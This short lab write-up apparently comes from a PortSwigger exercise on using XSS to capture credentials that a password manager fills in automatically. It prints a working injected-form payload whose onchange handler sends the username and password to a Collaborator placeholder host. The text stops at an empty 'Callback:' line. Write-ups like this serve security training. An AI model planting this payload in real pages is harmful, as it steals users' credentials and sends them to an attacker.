PortSwigger: Exploiting XSS+CSRF to Capture Passwords

Password managers that automatically fill a username and password into forms make it possible to bypass common XSS data-exfiltration protections: an injected form receives the auto-filled credentials directly, so the payload can read them without touching the session cookie.

Example payload (COLLAB_SUB is a placeholder for the Burp Collaborator subdomain; the onchange handler fires when the password manager fills the field):

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://COLLAB_SUB.oastify.com',{
    method:'POST',
    mode: 'no-cors',
    body:username.value+':'+this.value
});">

Callback: